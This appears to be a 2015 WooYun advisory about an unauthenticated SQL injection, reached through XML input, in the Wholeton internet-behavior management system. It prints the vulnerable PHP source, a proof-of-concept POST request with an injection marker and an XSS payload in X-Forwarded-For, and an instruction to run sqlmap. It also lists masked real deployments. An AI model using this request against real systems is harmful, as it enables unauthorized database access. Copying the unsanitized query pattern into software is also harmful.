当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(42) 关注此漏洞

缺陷编号: WooYun-2015-103638

漏洞标题: 惠尔顿上网行为管理系统XML实体注入(无需登录)

相关厂商: cncert国家互联网应急中心

漏洞作者: xfkxfk认证白帽子

提交时间: 2015-03-27 17:23

公开时间: 2015-06-25 16:46

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: sql注射漏洞 php源码审核 php源码分析

7人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-27: 细节已通知厂商并且等待厂商处理中
2015-03-27: 厂商已经确认,细节仅向厂商公开
2015-03-30: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-05-21: 细节向核心白帽子及相关领域专家公开
2015-05-31: 细节向普通白帽子公开
2015-06-10: 细节向实习白帽子公开
2015-06-25: 细节向公众公开

简要描述:

惠尔顿上网行为管理系统XML实体注入(无需登录)

详细说明:

惠尔顿上网行为管理系统XML实体注入(无需登录)

官网经典案例:http://**.**.**.**/Anli.php

外网部分实际案例:

code 区域
1.https://**.**.**.**
2.https://**.**.**.**/
3.**.**.**.**
4.**.**.**.**
5.**.**.**.**/
6.http://**.**.**.**/





这里存在一个通用的xml实体注入问题

之前有过分析:http://**.**.**.**/bugs/wooyun-2010-075009

这里也用到了那个微信的接口,导致同样的问题,不过这里没有文件读取,但是导致大量SQL注



文件:/base/wechat_interface.php

code 区域
<?php
/**
* wechat php test
*/

//define your token
$thisfile = basename($_SERVER['PHP_SELF']);
$RootDir = $_SERVER["DOCUMENT_ROOT"].'/base';
include_once "$RootDir/include/database.php";

define("TOKEN", "wholeton");

$wechatObj = new wechatCallbackapiTest();

if (!isset($_GET["echostr"])){
$wechatObj->responseMsg();
}else{
$wechatObj->valid();
}

exit;

class wechatCallbackapiTest
{
public function valid()
{
$echoStr = $_GET["echostr"];

//valid signature , option
if($this->checkSignature()){
echo $echoStr;
}
}

public function responseMsg()
{
//get post data, May be due to the different environments
$postStr = $GLOBALS["HTTP_RAW_POST_DATA"];

//extract post data
if (!empty($postStr)){

//$fw = fopen("/usr/local/WholetonTM/htdocs/wx.txt", "w");

$postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
$fromUsername = $postObj->FromUserName;
$toUsername = $postObj->ToUserName;
$event = trim($postObj->Event);
$EventKey = trim($postObj->EventKey);

// $g_str .= "fromUsername: ".$fromUsername."\n";
// $g_str .= "toUsername: ".$toUsername."\n";
// $g_str .= "event: ".$event."\n";
// $g_str .= "EventKey: ".str_replace("qrscene_","",$EventKey)."\n";

//fwrite($fw, $g_str);

switch ($event) {
case 'subscribe':
$focus = 1;
$scene_id = str_replace("qrscene_","",$EventKey);
break;
case 'unsubscribe':
$focus = 0;
break;
case 'SCAN':
$focus = 1;
$scene_id = $postObj->EventKey;
break;
}
//fwrite($fw, "focus:".$focus."\n");
global $gblDBConnect;
$sql_policy_info = "select id from tb_wechat_promote_policy where original_id='$toUsername'";

//fwrite($fw, "sql_policy_info:".$sql_policy_info."\n");

$data_policy_info= $gblDBConnect->getOne($sql_policy_info);

$sql_user_obj = "select count(*) as num, id, mac_list from tb_wechat_user_obj where promote_policy_id=".$data_policy_info->id." and wechat_id='$fromUsername'";
$data_user_obj = $gblDBConnect->getOne($sql_user_obj);

//fwrite($fw, "sql_user_obj:".$sql_user_obj."\n");

$sql_edit_mac = "";
if($focus==1){
$sql_mac = "select mac from tb_wechat_mac_scene where scene_id=".$scene_id;
//fwrite($fw, "sql_mac:".$sql_mac."\n");
$data_mac = $gblDBConnect->getOne($sql_mac);
$mac = $data_mac->mac;
if ($data_user_obj->mac_list!="") {
$mac_list_ary = explode(",,",$data_user_obj->mac_list);
//fwrite($fw, "mac_list:".$ata_user_obj->mac_list."\n");
if (is_array($mac_list_ary)) {
if (!in_array($mac, $mac_list_ary)) {
//fwrite($fw, " not in_array:".$mac."\n");
$mac_list_ary[] = $mac;
$mac_str = implode(",,", $mac_list_ary);

$sql_edit_mac = "mac_list='$mac_str', ";
}
}
}else {
//fwrite($fw, " not = mac_list:".$mac."\n");
$sql_edit_mac = "mac_list='$mac', ";
}
}
//fwrite($fw, "num".$data_user_obj->num."\n");
if($data_user_obj->num==0){
$sql_add = "insert into tb_wechat_user_obj(promote_policy_id, wechat_id, mac_list, focus) values($data_policy_info->id, '$fromUsername', '$mac', $focus)";
//fwrite($fw, "sql_add:".$sql_add."\n");
$gblDBConnect->execute($sql_add);
}else{
$sql_edit = "update tb_wechat_user_obj set ".$sql_edit_mac."focus=$focus where id=".$data_user_obj->id;
//fwrite($fw, "sql_edit:".$sql_edit."\n");
$gblDBConnect->execute($sql_edit);
}
exec('/usr/local/WholetonTM/triton/bin/TritonIPCTools -R');
//fwrite($fw, $g_str);
//fclose($fw);

}else {
//$g_str .= "exit in valid()\n";
exit;
}
}
private function receiveEvent($object){
$content = "";

switch ($object->Event) {
case 'subscribe':
$content = (!empty($object->EventKey))?("\n来自二维码场景 ".str_replace("qrscene_","",$object->EventKey)):"";
break;
case 'unsubscribe':
$content = "取消关注";
break;
case 'SCAN':
$content = "扫描场景". $object->EventKey;
break;
}
$fw = fopen("/usr/local/WholetonTM/htdocs/wx1.txt", "w");
fwrite($fw, ($object->Event)."\nEventKey:".($object->EventKey)."\n".$content);
fclose($fw);
return $content;
}
private function checkSignature()
{
$signature = $_GET["signature"];
$timestamp = $_GET["timestamp"];
$nonce = $_GET["nonce"];

$token = TOKEN;
$tmpArr = array($token, $timestamp, $nonce);
sort($tmpArr, SORT_STRING);
$tmpStr = implode( $tmpArr );
$tmpStr = sha1( $tmpStr );

if( $tmpStr == $signature ){
return true;
}else{
return false;
}
}
}

?>



当没有$_GET["echostr"]函数时,则直接调用responseMsg,不用判断checkSignature了

然后获取:$postStr = $GLOBALS["HTTP_RAW_POST_DATA"];

之后xml中的参数值进入sql语句

里面的4各参数:$fromUsername、$toUsername、$even、$EventKey都存在注入

漏洞证明:

保存如下请求为111.txt

code 区域
POST /base/wechat_interface.php HTTP/1.1
Host: https://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Forwarded-For: <img src=1 onerror=alert(1)>**.**.**.**
Connection: keep-alive
Content-Type: text/xml
Content-Length: 179

<?xml version="1.0" encoding="utf-8"?>
<xml>
<ToUserName>111111*</ToUserName>
<FromUserName>222222</FromUserName>
<EventKey>333333</EventKey>
<Event>subscribe</Event>
</xml>



然后使用sqlmap跑一下即可。

1.png



2.png

修复方案:

个系统可以重写了。。。

版权声明:转载请注明来源 xfkxfk@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-03-27 16:44

厂商回复:

已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-03-25 17:27 | Ton7BrEak ( 普通白帽子 | Rank:292 漏洞数:64 | 我要继续努力!)
    0

    @水晶 关注下 xml~

  2. 2015-03-25 17:34 | 屎蛋 ( 路人 | Rank:8 漏洞数:2 | boom)
    0

    m

  3. 2015-03-26 07:33 | 明月影 ( 路人 | Rank:12 漏洞数:8 )
    0

    这个不多见。

  4. 2015-03-26 10:50 | 水晶 ( 实习白帽子 | Rank:58 漏洞数:22 | 热爱生活,喜欢互联网)
    0

    @Ton7BrEak ok

登录后才能发表评论,请先 登录